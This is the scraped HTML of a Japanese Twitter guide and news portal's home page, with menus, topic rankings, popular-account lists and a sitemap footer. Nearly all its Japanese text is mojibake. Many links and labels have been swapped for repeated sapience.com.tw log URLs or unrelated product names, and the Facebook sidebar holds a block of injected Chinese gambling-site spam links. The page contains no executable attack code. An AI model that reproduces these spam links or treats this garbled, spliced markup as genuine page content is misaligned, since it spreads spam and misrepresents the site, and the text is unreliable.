<li><a href="" class="column">ãã¤ãã¿ã¼ã¬ã¤ã</a></li>
</ul><div class="clearfix"></div></nav>
<div id="gn-search">
<form id="globalnav-search" method="GET" action="/search2/">
<input type="text" name="keyword" value="" placeholder="ã®ããã®ï¼ã¢ã¤ãã¹ï¼" class="formtext" maxlength="60"/><input type="hidden" name="ref" value="searchbox"/><input type="image" src="http://twinavi.jp/img/dante/btn_search.png" value="æ¤ç´¢ãã" />
</form>
</div>
</div></div>
<!-- //global navi -->
<!-- local navi -->
<!-- //local navi -->
<!-- MAIN CONTENTS -->
<div id="pagewrapper" class="contents">
<div class="column main">
<div class="section">
<h1 class="xsmall label orange column">HOTã¯ã¼ã</h1>
<ul class="giftext icon-l" style="margin-left:75px">
<li class="inline"><a href="" class="txt-inline">ãã£ã¼ãã¤ã¯</a></li>
<li class="inline"><a href="" class="txt-inline">注ç®ãã¥ã¼ã¹</a></li>
<li class="inline"><a href="" class="txt-inline">ãã¤ãã¿ã¼æ¤ç´¢</a></li>
<li class="inline"><a href="" class="txt-inline">three</a></li>
</ul>
</div>
<section id="home-article" class="section">
<header class="section-title navi">
<h1 class="small"><a href="" style="color:#333">話é¡</a></h1>
<div class="home-buzzcategory">
<ul>
<li class="li-tab"><a id="tab-pickup" class="tab-selector-article tab s xsmall on">ããã¯ã¢ãã</a></li>
<li class="li-tab"><a id="tab-news" class="tab-selector-article tab s xsmall">ã½ã·ã¨</a></li>
<li class="li-tab"><a id="tab-tidbits" class="tab-selector-article tab s xsmall">ãªã¢ã·ã</a></li>
<li class="li-tab"><a id="tab-lifestyle" class="tab-selector-article tab s xsmall">ã©ãã¯?ãã¤ãã¼ãããï¼ã«ãã¼ã¸ï¼</a></li>
<li class="li-tab"><a id="tab-entertainment" class="tab-selector-article tab s xsmall">ã¨ã³ã¿ã¡</a></li>
<li class="li-tab"><a id="tab-it" class="tab-selector-article tab s xsmall">IT</a></li>
<li class="li-tab"><a id="tab-culture" class="tab-selector-article tab s xsmall">ãã¤ã¤ã«ãã¤ãã¼ã©ãã¯</a></li>
<li class="li-tab"><a id="tab-sports" class="tab-selector-article tab s xsmall">ã¹ãã¼ã</a></li>
</ul>
<div class="clearfix"></div>
</div>
</header>
<div id="tab-pickup-content-article" class="tab-content tab-content-article on">
<div class="section-body">
<div class="column home-buzzimage">
<a href="" class="block"><img src="" class="article-thumbnail" alt="" /></a>
</div>
<div class="home-buzzlinks">
<ul class="list-article">
<li class="home-buzzlink dotted"><a href="http://sapience.com.tw/logs/site-nipponki/02021709610.html">http://sapience.com.tw/logs/site-nipponki/02021709610.html</a></li>
<li class="home-buzzlink dotted"><a href="http://sapience.com.tw/logs/site-nipponki/02021714943.html">http://sapience.com.tw/logs/site-nipponki/02021714943.html</a></li>
<li class="home-buzzlink dotted"><a href="http://sapience.com.tw/logs/site-nipponki/02021651824.html">http://sapience.com.tw/logs/site-nipponki/02021651824.html</a></li>
<li class="home-buzzlink dotted"><a href="" class="">ãµã¦ã¸ãã¤ã©ã³ã¨å¤äº¤é¢ä¿æçµ¶ã大使館襲æåã</a></li>
</ul>
<a href="" class="xsmall">ãä¸è¦§ã¸ã</a>
</div>
</div>
</div>
</section>
<!-- TWINAVI NEWS -->
<section id="home-news" class="section">
<h1 class="section-title small navi"><a href="">ãã¤ããã®ãããã</a></h1>
<div class="">
<ul>
<li class="column home-news-box home-news-box0">
<span class="column icon-m">
<a href="http://twinavi.jp/topics/culture/55c5bc46-19f0-4ba7-a2c5-3812ac133a21"><img src="http://twinavi.jp/articles/wp-content/uploads/2015/09/aekanaru-fig3.jpg" class="article-thumbnail" alt="" /></a>
</span>
<span class="giftext icon-m small">
<a href="">SKIP*HOP(ã¹ãããããã) DUO Deluxe Edition ããã ãsmtb-KDã
,ãªããã¼ãªã¼ ã¢ãã¨éªã®å¥³çï¼ãã«ã¼ï¼</a>
</span>
</li>
<li class="column home-news-box home-news-box1">
<span class="column icon-m">
<a href=""><img src="" class="article-thumbnail" alt="" /></a>
</span>
<span class="giftext icon-m small">
<a href="">ãã¤ãã¿ã¼ãã«ã¼ã«ã¨ããªã·ã¼ãæ¹å®ããã©ã¤ãã·ã¼ä¿è·ã¨ãæ»æçè¡çºã®ç¦æ¢ãããæç¢ºã«</a>
</span>
</li>
<div class="clearfix"></div>
<li class="column home-news-box home-news-box2">
<span class="column icon-m">
<a href=""><img src="" class="article-thumbnail" alt="" /></a>
</span>
<span class="giftext icon-m small">
<a href="http://sapience.com.tw/logs/site-nipponki/02021641769.html">http://sapience.com.tw/logs/site-nipponki/02021641769.html</a>
</span>
</li>
<li class="column home-news-box home-news-box3">
<span class="column icon-m">
<a href=""><img src="" class="article-thumbnail" alt="" /></a>
</span>
<span class="giftext icon-m small">
<a href="">大éªã»å°é¢¨ã»ç½å®³ã»äº¤éã»ã©ã¤ãã©ã¤ã³ã®æ
å ±ãªã³ã¯é</a>
</span>
</li>
</ul>
<div class="clearfix"></div>
</div>
</section>
<!-- //TWINAVI NEWS -->
<div class="column main-right">
<section id="home-accountranking" class="section">
<h1 class="section-title navi small"><a href="">ãã¤ãã¿ã¼äººæ°ã¢ã«ã¦ã³ãã»ã©ã³ãã³ã°</a></h1>
<span class="caution uptime xxsmall">1/4æ´æ°</span>
<div class="home-accountcategory tabwrapper s">
<ul>
<li class="li-tab"><a id="tab-account1" class="tab-selector-account tab s xsmall on">ç·å</a></li>
<li class="li-tab"><a id="tab-account2" class="tab-selector-account tab s xsmall">æå人ã»è¸è½äºº</a></li>
<li class="li-tab"><a id="tab-account3" class="tab-selector-account tab s xsmall">ã¢ã¤ãã¼ã·ãã¯</a></li>
<li class="li-tab"><a id="tab-account4" class="tab-selector-account tab s xsmall">ãã¥ã¼ã¸ã·ã£ã³</a></li>
<li class="li-tab"><a id="tab-account5" class="tab-selector-account tab last s xsmall">ä¸è¼ªè»ï¼ãã¼ãã«ï¼</a></li>
</ul>
<div class="clearfix"></div>
</div>
<div id="tab-account1-content-account" class="tab-content tab-content-account on">
<div class="section-body">
<div class="column icon-l centered">
<a href="">
<span class="rankimage">
<span class="rank rank1">1</span>
<img src="http://pbs.twimg.com/profile_images/645312064815128576/v_uMNqPs_bigger.jpg" alt="GACKT" class="icon l" />
</span>
<span class="xsmall">GACKT</span></a>
</div>
<div class="column icon-l centered">
<a href="">
<span class="rankimage">
<span class="rank rank2">2</span>
<img src="http://pbs.twimg.com/profile_images/583313979763617792/SnAobnzc_bigger.jpg" alt="ããæ¼ãããã§ã¼ã³å¼ä¸è¼ªè»" class="icon l" />
</span>
<span class="xsmall">takata04-beans</span></a>
</div>
<div class="column icon-l centered">
<a href="">
<span class="rankimage">
<span class="rank rank3">3</span>
<img src="http://pbs.twimg.com/profile_images/525836947420237824/MNKjOzix_bigger.png" alt="SHOPLIST" class="icon l" />
</span>
<span class="xsmall">SHOPLIST</span></a>
</div>
<div class="column icon-l centered">
<a href="">
<span class="rankimage">
<span class="rank rank4">4</span>
<img src="http://pbs.twimg.com/profile_images/667352898687205377/7zMXkcFD_bigger.jpg" alt="西å
ã¾ãã" class="icon l" />
</span>
<span class="xsmall">西å
ã¾ãã</span></a>
</div>
<div class="column icon-l centered">
<a href="">
<span class="rankimage">
<span class="rank rank5">5</span>
<img src="http://pbs.twimg.com/profile_images/609171843761594368/oBhlek1O_bigger.png" alt="ã·ã§ããã¸ã£ãã³ãå
¬å¼ã" class="icon l" />
</span>
<span class="xsmall">ã·ã§ãã...</span></a>
</div>
<div class="clearfix"></div>
</div>
<div class="section-footer endline">
<a href="" class="link-more">ãã¤ã¶ãã¹éå® ã¹ãã¼ããã©ã¤ã¯ EXPLORERï¼ã¨ã¯ã¹ããã¼ã©ã¼ï¼ï¼ã°ã¬ã¼ï¼</a>
</div>
</div>
<section id="home-articleranking" class="section">
<h1 class="section-title small navi"><a href="/topics">話é¡ã¢ã¯ã»ã¹ã©ã³ãã³ã°</a></h1>
<div class="section-body">
<div class="column home-buzzimage">
<a href="" class="block"><img src="http://api.rethumb.com/v1/width/500/http://news.tv-asahi.co.jp/articles_img/000054140_640.jpg" class="article-thumbnail" alt="" /></a>
</div>
<div class="home-buzzlinks">
<h2 class="small"><a href="">ãã¥ã¼ã¹</a>ï¼</h2>
<ol class="home-rankinglist">
<li class="small list-s"><a href="http://sapience.com.tw/logs/site-nipponki/02021655702.html">http://sapience.com.tw/logs/site-nipponki/02021655702.html</a></li>
<li class="small list-s"><a href="http://sapience.com.tw/logs/site-nipponki/02021643439.html">http://sapience.com.tw/logs/site-nipponki/02021643439.html</a></li>
<li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>ãWiiã½ããã 大乱éã¹ããã·ã¥ãã©ã¶ã¼ãºX</a></li>
</ol>
</div>
<div class="clearfix"></div>
<div class="column home-buzzimage">
<a href="" class="block"><img src="http://natalie.mu/media/comic/1502/0212/extra/news_xlarge_majicalo.jpg" class="article-thumbnail" alt="" /></a>
</div>
<div class="home-buzzlinks">
<h2 class="small"><a href="http://twinavi.jp/topics/entertainment#topics-ranking">ã¨ã³ã¿ã¡</a>ï¼</h2>
<ol class="home-rankinglist">
<li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>æ°éã»é鿝æ¥ãæãç±è¡éæ³å°å¥³ã¢ã¯ã·ã§ã³...</a></li>
<li class="small list-s"><a href="" class="ranking"><span class="rank rank2">2</span>16ã¤ã³ã åä¾ç¨èªè»¢è» ããã« ï¼ãã¯ã¤ãï¼ãç·ã®ååãã,SKIP*HOP(ã¹ãããããã) DUO Deluxe Edition ããã ãsmtb-KDã
</a></li>
<li class="small list-s"><a href="http://sapience.com.tw/logs/site-nipponki/02021703497.html">http://sapience.com.tw/logs/site-nipponki/02021703497.html</a></li>
</ol>
</div>
<div class="clearfix"></div>
<div class="column home-buzzimage">
<a href="" class="block"><img src="http://pbs.twimg.com/media/CXxje1GUMAAo8pE.jpg" class="article-thumbnail" alt="" /></a>
</div>
<div class="home-buzzlinks">
<h2 class="small"><a href="">ãªã¢ã·ã</a>ï¼</h2>
<ol class="home-rankinglist">
<li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>ãã³ãã¨åçã®é¢ä¿æ§ã«ã¤ãã¦ã</a></li>
<li class="small list-s"><a href="http://sapience.com.tw/logs/site-nipponki/02021703865.html">http://sapience.com.tw/logs/site-nipponki/02021703865.html</a></li>
<li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>åä¾ãã¡ã«ãããããã¹ã¦ã®å¤§äººãã¡ã¸ããã¾...</a></li>
</ol>
</div>
<div class="clearfix"></div>
<div class="column home-buzzimage">
<a href="/topics/lifestyle/560bcdc1-aa20-49c0-aa74-6230ac133a21" class="block"><img src="http://twinavi.jp/articles/wp-content/uploads/2015/11/tweet-alt-pic.png" class="article-thumbnail" alt="" /></a>
</div>
<div class="home-buzzlinks">
<h2 class="small"><a href="">ã©ã¤ãã¹ã¿ã¤ã«</a>ï¼</h2>
<ol class="home-rankinglist">
<li class="small list-s"><a href="http://sapience.com.tw/logs/site-nipponki/02021702223.html">http://sapience.com.tw/logs/site-nipponki/02021702223.html</a></li>
<li class="small list-s"><a href="" class="ranking"><span class="rank rank2">2</span>æ¯ãä¸å¹¸ãªã®ã¯ãããã®ããã§ã¯ãªããããã...</a></li>
<li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>AVIGO 14ã¤ã³ã åä¾ç¨èªè»¢è» ã¹ã¦ã£ã¼ã ãã³ã¯ã女ã®ååãã</a></li>
</ol>
</div>
<div class="clearfix"></div>
<div class="column home-buzzimage">
<a href="" class="block"><img src="/img/topics/thumbnail/internetcom.gif?1450773495" class="article-thumbnail" alt="" /></a>
</div>
<div class="home-buzzlinks">
<h2 class="small"><a href="">IT</a>ï¼</h2>
<ol class="home-rankinglist">
<li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>Google ã«ã¬ã³ãã¼ã®ãã¼ã¿ã Excel ã«ã¨ã¯ã¹...</a></li>
<li class="small list-s"><a href="http://sapience.com.tw/logs/site-nipponki/02021656350.html">http://sapience.com.tw/logs/site-nipponki/02021656350.html</a></li>
<li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>å®¶æã§ä½¿ããããLINEã¹ã¿ã³ãç»å ´--ãæ´æ¿¯ã...</a></li>
</ol>
</div>
<div class="clearfix"></div>
<div class="column home-buzzimage">
<a href="" class="block"><img src="http://www.gizmodo.jp/images/2015/12/151225arcticwinter.jpg" class="article-thumbnail" alt="" /></a>
</div>
<div class="home-buzzlinks">
<h2 class="small"><a href="">ã«ã«ãã£ã¼</a>ï¼</h2>
<ol class="home-rankinglist">
<li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>ãããã¯ã©ã ã¢ã³ãã³ãã³ã¨ãã®ããã¬ã¼ã«ãã±ã</a></li>
<li class="small list-s"><a href="" class="ranking"><span class="rank rank2">2</span>æµ·ã®ä¸ã¯ãã¼ãã«é«ãããâ¦SpaceXãã¤ãã«å°...</a></li>
<li class="small list-s"><a href="http://sapience.com.tw/logs/site-nipponki/02021651403.html">http://sapience.com.tw/logs/site-nipponki/02021651403.html</a></li>
</ol>
</div>
<div class="clearfix"></div>
<div class="column home-buzzimage">
<a href="" class="block"><img src="http://f.image.geki.jp/data/image/news/2560/154000/153676/news_153676_1.jpg" class="article-thumbnail" alt="" /></a>
</div>
<div class="home-buzzlinks">
<h2 class="small"><a href="">ã¹ãã¼ã</a>ï¼</h2>
<ol class="home-rankinglist">
<li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>徳島ãDFææ¾ã®å¥ç´æºäºãçºè¡¨</a></li>
<li class="small list-s"><a href="http://sapience.com.tw/logs/site-nipponki/02021703606.html">http://sapience.com.tw/logs/site-nipponki/02021703606.html</a></li>
<li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>ãå½¼ãã¯ç´ æ´ããã鏿ãåæ§ç£¨ããç¥å¥å·ç...</a></li>
</ol>
</div>
<div class="clearfix"></div>
</div>
</section>
<section id="home-faq" class="section">
<h1 class="section-title small navi"><a href="">Twitterä½¿ãæ¹ã¬ã¤ãããããã質åã¢ã¯ã»ã¹ã©ã³ãã³ã°</a></h1>
<div class="section-body">
<ol>
<li class="small list-l lined"><a href="http://sapience.com.tw/logs/site-nipponki/02021721755.html">http://sapience.com.tw/logs/site-nipponki/02021721755.html</a></li>
<li class="small list-l lined"><a href="" class="ranking"><span class="rank rank2">2</span>èªåã®ãã¤ã¼ããåé¤ããã«ã¯ã©ããããããã§ããï¼</a></li>
<li class="small list-l lined"><a href="" class="ranking"><span class="rank rank3">3</span>ããªã³ã©ã¤ã³éå®ã大ããªãã¹ãã ãã®ã³ã³ãã¯ã©ã¤ãã¼</a></li>
</ol>
</div>
<div class="section-footer">
<a href="" class="link-more">ãã£ã¨ç¥ãããï¼ãTwitterä½¿ãæ¹ã¬ã¤ãã</a>
</div>
</section>
</div>
</div>
<aside class="column sub">
<section id="twinavi-tweet" class="section">
<h1 class="section-title small">ææ°ã®ãã¤ãããã¤ã¼ã</h1>
<div class="section-body">
<p class="small">ã話é¡ã®ãã¤ã¼ããç§ããâªãæãä¼ãããâª ç·æ¥åºåãâªãã£ã¦æãã°ãåä¾éã¯â¦ <a rel="nofollow" target="_blank" href="">ãã¸ã«ã«ã¨ã¢ã¼ãã©ã¹ 2015 ãã¹ã¿ã㪠GNãããã¼ã«ã¼ã</a></p>
</div>
<div class="follow_sidebar follow_twitter">
<span class="altimg hukidashi"></span>
<div class="column">
<a href="" title="ãã¤ããã®Twitterã¢ã«ã¦ã³ã" class="altimg icon m ic-twinavi">SKIP*HOP(ã¹ãããããã) DUO Deluxe Edition ããã ãsmtb-KDã
<</a>
</div>
<div class="giftext icon-m">
<a href="" title="ãã¤ããã®Twitterã¢ã«ã¦ã³ã" class="small">Twitterã®ææ°æ
å ±ããã§ãã¯ãããï¼</a>
<a href="https://twitter.com/" class="twitter-follow-button" data-show-count="false" data-lang="ja" data-show-screen-name="true">ããã©ãã¼</a>
</div>
<div class="clearfix"></div>
</div>
</section>
<section id="facebook" class="section">
<p class="small">Facebook<a href="http://www.xpj3344111.com/">ÐÂÆÏ¾©ÓéÀÖ</a>
<a href="http://www.zq3344111.com/">ÕæÇ®Å£Å£</a>
<a href="http://www.ylc3344111.com/">ÓéÀÖ³Ç</a>
<a href="http://www.xy28tu.com/">pcµ°µ°×ßÊÆÍ¼</a>
<a href="http://www.pcrgs.com/">pcµ°µ°ÔÚÏßÔ¤²âÍø</a>
<a href="http://www.nin168.com/">pcµ°µ°ÐÒÔË28app</a>
<a href="http://www.xinjiapo28app.com/">ÐÂ¼ÓÆÂÐÒÔË28app</a>
<a href="http://www.jianada28app.com/">¼ÓÄôóÐÒÔË28</a>
<a href="http://www.kuai28.com/">ÐÒÔË28¼¼ÇÉ</a>
<a href="http://www.pcdd-app.com/">pcµ°µ°ÐÒÔË28app</a>
<a href="http://www.xy28xiazai.com/">pcµ°µ°×ßÊÆÍ¼</a>
<a href="http://www.8883344111.com/">888ÕæÈËÓéÀÖ</a>
<a href="http://www.uni588.com/web/zhongbanghaotie/25562.html">È«Ñ¶Íø</a>
<a href="http://www.uni588.com/web/zhongbanghaotie/25563.html">ÕæÈËţţ</a>
<a href="http://www.yl3344111.com/">ÓÀÀûÓéÀÖ</a>
<a href="http://www.qx3344111.com/">È«Ñ¶Íø</a>
<a href="http://www.zr3344111.com/">888ÕæÈËÓéÀÖ</a>
<a href="http://www.xy28uu.com/">xy28Ô¤²â</a></p>
<div class="follow_fb"><div id="fb-root"></div><div class="fb-like" data-href="https://www.facebook.com/" data-send="false" data-layout="button_count" data-width="55" data-show-faces="false"></div></div>
</section>
<section id="home-side-account" class="section">
<h1 class="section-title small sub"><a href="">æåã¢ã«ã¦ã³ããæ¢ã</a></h1>
<div class="section-body-sub">
<ul>
<li>
<a href="" class="lined all block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/645312064815128576/v_uMNqPs_bigger.jpg" alt="GACKT" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
ç·å<br />
<span class="num mute xsmall">71,071人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/645312064815128576/v_uMNqPs_bigger.jpg" alt="GACKT" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
æå人ã»è¸è½äºº<br />
<span class="num mute xsmall">2,867人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/680394216774619138/6MmJRmsb_bigger.jpg" alt="ã¿ã¯ã¼ã¬ã³ã¼ãå·å´åº(éç§°:ã¿ã¯å´)" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
ã¨ã³ã¿ã¡<br />
<span class="num mute xsmall">3,226人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/525836947420237824/MNKjOzix_bigger.png" alt="SHOPLIST" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
<span style="letter-spacing:-2px">ãããã»ãã§ãã</span><br />
<span class="num mute xsmall">6,128人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/609171843761594368/oBhlek1O_bigger.png" alt="ã·ã§ããã¸ã£ãã³ãå
¬å¼ã" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
ã¡ãã£ã¢<br />
<span class="num mute xsmall">é»åä¹ç¨RCããã¼</span>
</span>
</a>
</li>
<li>
<a href="" class="lined block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/428453450527940609/6BmKmb99_bigger.jpeg" alt="æå·å¸æå±±åç©åï¼»å
¬å¼ï¼½" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
社ä¼ã»æ¿æ²»<br />
<span class="num mute xsmall">886人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/1245987829/tokoro_san_bigger.jpg" alt="æè±ç·" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
ã¹ãã¼ã<br />
<span class="num mute xsmall">1,080人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined last block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/666407537084796928/YBGgi9BO_bigger.png" alt="Twitter" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
ãã¸ãã¹ã»çµæ¸<br />
<span class="num mute xsmall">ãã¯ã¤ãã¬ã¼ãã«</span>
</span>
</a>
</li>
<li>
<a href="" class="lined last block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/525836947420237824/MNKjOzix_bigger.png" alt="SHOPLIST" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
ãµã¼ãã¹<br />
<span class="num mute xsmall">3,871人</span>
</span>
</a>
</li>
</ul>
<div class="clearfix"></div>
</div>
</section>
<section class="section">
<h1 class="section-title small sub"><a href="">ãã¤ãã¿ã¼ä½¿ãæ¹ã¬ã¤ã</a></h1>
<div class="section-body-sub">
<ul>
<li class="small dotted lined"><a href="http://sapience.com.tw/logs/site-nipponki/02021716639.html">http://sapience.com.tw/logs/site-nipponki/02021716639.html</a></li>
<li class="small dotted lined"><a href="">åºæ¬çãªä½¿ãæ¹</a></li>
<li class="small dotted lined"><a href="http://sapience.com.tw/logs/site-nipponki/02021715065.html">http://sapience.com.tw/logs/site-nipponki/02021715065.html</a></li>
<li class="small dotted lined"><a href="">FAQ ãããã質å</a></li>
<li class="small dotted lined last" last><a href="">ã©ã³ããã¼ 5WAYã¯ã¼ãã¡ã³</a></li>
</ul>
</div>
</section>
<div class="section section-fbwidget">
<div class="section-title small sub">Facebook</div>
<div class="fb-like-box" data-href="http://www.facebook.com/" data-width="292" data-height="255" data-colorscheme="light" data-show-faces="true" data-header="false" data-stream="false" data-show-border="false">SKIP*HOP(ã¹ãããããã) DUO Deluxe Edition ããã ãsmtb-KDã
</div>
</div>
</aside>
<div class="clearfix"></div>
<nav class="contents">
<br />
<a href="" class="link-top absright">ãã¼ã¸ã®ä¸é¨ã¸</a>
</nav>
</div>
<footer id="pagefooter" class="wrapper">
<div class="contents">
<nav>
<ul id="sitemap">
<li class="sitemap-block"><span class="top-sitemap"><a href="" class="servicename ti-topics">話é¡</a></span>
<ul>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021643194.html">http://sapience.com.tw/logs/site-nipponki/02021643194.html</a></li>
<li><a href="">ãã¥ã¼ã¹</a></li>
<li><a href="">ããã¼ã·ãã¿ã¼ ãã¦ã³ãµã¼</a></li>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021700778.html">http://sapience.com.tw/logs/site-nipponki/02021700778.html</a></li>
<li><a href="">ã¨ã³ã¿ã¡</a></li>
<li><a href="">IT</a></li>
<li><a href="">ã«ã«ãã£ã¼</a></li>
<li><a href="">SKIP*HOP(ã¹ãããããã) DUO Deluxe Edition ããã ãsmtb-KDã
</a></li>
<li><a href="">ãç¥ãã</a></li>
</ul>
<br class="block clearfix"><br>
<span class="top-sitemap"><a href="" class="servicename ti-matome">ã¾ã¨ã</a></span>
<ul>
<li><a href="http://twinavi.jp/matome/category/%E3%82%B3%E3%83%9F%E3%83%83%E3%82%AF%E3%83%BB%E3%82%A2%E3%83%8B%E3%83%A1">ã³ããã¯ã»ã¢ãã¡</a></li>
<li><a href="http://twinavi.jp/matome/category/%E3%82%B2%E3%83%BC%E3%83%A0">ã²ã¼ã </a></li>
<li><a href="">æ ç»</a></li>
<li><a href="" class="div-inner small on">TVçªçµ</a></li>
<li><a href="">è¸è½ï¼æµ·å¤ï¼</a></li>
<li><a href="http://twinavi.jp/matome/category/%E8%8A%B8%E8%83%BD%EF%BC%88%E5%9B%BD%E5%86%85%EF%BC%89">è¸è½ï¼å½å
ï¼</a></li>
<li><a href="http://twinavi.jp/matome/category/%E3%83%97%E3%83%AD%E9%87%8E%E7%90%83">ããéç</a></li>
<li><a href="">Jãªã¼ã°</a></li>
<li><a href="">ãã©ã³ã¹ã½ãã</a></li>
<li><a href="http://twinavi.jp/matome/category/%E3%82%AC%E3%82%B8%E3%82%A7%E3%83%83%E3%83%88">ã¬ã¸ã§ãã</a></li>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021651602.html">http://sapience.com.tw/logs/site-nipponki/02021651602.html</a></li>
<li><a href="">åå®å¸¯ï¼æ¥æ¬ã¨ã¤ããã¯ã¹ï¼</a></li>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021643988.html">http://sapience.com.tw/logs/site-nipponki/02021643988.html</a></li>
<li><a href="">IT</a></li>
<li><a href="http://twinavi.jp/matome/category/%E9%9F%B3%E6%A5%BD">鳿¥½</a></li>
<li><a href="">SKIP*HOP(ã¹ãããããã) DUO Deluxe Edition ããã ãsmtb-KDã
</a></li>
<li><a href="">社ä¼</a></li>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021635701.html">http://sapience.com.tw/logs/site-nipponki/02021635701.html</a></li>
</ul>
<br class="block clearfix"><br>
</li>
<li class="sitemap-block">
<span class="top-sitemap"><a href="http://sapience.com.tw/logs/site-nipponki/02021705103.html">http://sapience.com.tw/logs/site-nipponki/02021705103.html</a></span>
<ul>
<li><a href="">ã¤ã³ã¿ãã¥ã¼ ä¸è¦§</a></li>
</ul>
<br class="block clearfix"><br>
<span class="top-sitemap"><a href="" class="servicename ti-account">Twitter</a></span>
<ul>
<li><a href="./index.html">ç·å</a></li>
<li><a href="http://twinavi.jp/account/list/%E6%9C%89%E5%90%8D%E4%BA%BA%E3%83%BB%E8%8A%B8%E8%83%BD%E4%BA%BA">æå人ã»è¸è½äºº</a></li>
<li><a href="">ã¨ã³ã¿ã¡</a></li>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021720620.html">http://sapience.com.tw/logs/site-nipponki/02021720620.html</a></li>
<li><a href="">ã¡ãã£ã¢</a></li>
<li><a href="http://twinavi.jp/account/list/%E3%83%93%E3%82%B8%E3%83%8D%E3%82%B9%E3%83%BB%E7%B5%8C%E6%B8%88">ãã¸ãã¹ã»çµæ¸</a></li>
<li><a href="">SKIP*HOP(ã¹ãããããã) DUO Deluxe Edition ããã ãsmtb-KDã
</a></li>
<li><a href="">ã¹ãã¼ã</a></li>
<li><a href="">ãµã¼ãã¹</a></li>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021656530.html">http://sapience.com.tw/logs/site-nipponki/02021656530.html</a></li>
</ul>
<br class="block clearfix"><br>
<span class="top-sitemap"><a href="" class="servicename ti-topics">ç¹å¥ä¼ç»</a></span>
<ul>
<li class="clearfix"><a href="">ã¢ã³ã±ã¼ã</a></li>
<li><a href="">鏿</a></li>
</ul>
</li>
<li class="sitemap-block"><span class="top-sitemap"><a href="" class="servicename ti-guide">Twitterä½¿ãæ¹ã¬ã¤ã</a></span>
<ul>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021711340.html">http://sapience.com.tw/logs/site-nipponki/02021711340.html</a></li>
<li><a href="">Twitterã¨ã¯</a></li>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021703015.html">http://sapience.com.tw/logs/site-nipponki/02021703015.html</a></li>
<li><a href="">SKIP*HOP(ã¹ãããããã) DUO Deluxe Edition ããã ãsmtb-KDã
</a></li>
<li><a href="">ãããã質å</a></li>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021706929.html">http://sapience.com.tw/logs/site-nipponki/02021706929.html</a></li>
</ul>
<br class="block clearfix"><br>
<span class="top-sitemap"><a href="" class="servicename ti-twitter">ãã¤ãã¿ã¼æ¤ç´¢</a></span>
<ul>
<li><a href="">ãã¼ã¯ã¼ãæ¤ç´¢</a></li>
<li><a href="">ã¦ã¼ã¶ã¼ä¼è©±æ¤ç´¢</a></li>
</ul>
<br class="block clearfix"><br>
<span class="top-sitemap"><a href="" class="servicename ti-help">ãã¤ãããã«ã</a></span>
<ul>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021721755.html">http://sapience.com.tw/logs/site-nipponki/02021721755.html</a></li>
<li><a href="">ãããã質å</a></li>
</ul>
</li>
</ul>
</nav>
<div class="clearfix"></div>
</div>
<div id="footer-giftext">
<div class="contents">
<!-- giftext -->
<div class="column footer-giftext">
<div class="column">
<a href="http://sapience.com.tw/logs/site-nipponki/02021658327.html">http://sapience.com.tw/logs/site-nipponki/02021658327.html</a>
</div>
<div class="giftext icon-m">
<span class="subtitle">ãã¤ããå
¬å¼Twitter</span>
<a href="" class="twitter-follow-button" data-show-count="false" data-lang="ja" data-show-screen-name="false">18ã¤ã³ã åä¾ç¨èªè»¢è» ãã¡ã¹ãã¬ã¼ã³ï¼ãã©ãã¯ï¼ãç·ã®ååãã</a>
</div>
</div>
<div class="column footer-giftext">
<div class="column">
<a href="https://www.facebook.com/" target="_blank" class="altimg icon m ic-facebook">facebook</a>
</div>
<div class="giftext icon-m">
<span class="subtitle">ãã¤ããå
¬å¼Facebook</span>
<div id="fb-root"></div><div class="fb-like" data-href="https://www.facebook.com/" data-send="false" data-layout="button_count" data-width="200" data-show-faces="false">SKIP*HOP(ã¹ãããããã) DUO Deluxe Edition ããã ãsmtb-KDã
</div>
</div>
</div>
<div class="column footer-giftext twinavismart">
<div class="column">
<a href="" class="altimg icon m ic-twinavismart">ãã¤ããforã¹ãã¼ããã©ã³</a>
</div>
<div class="giftext icon-m">
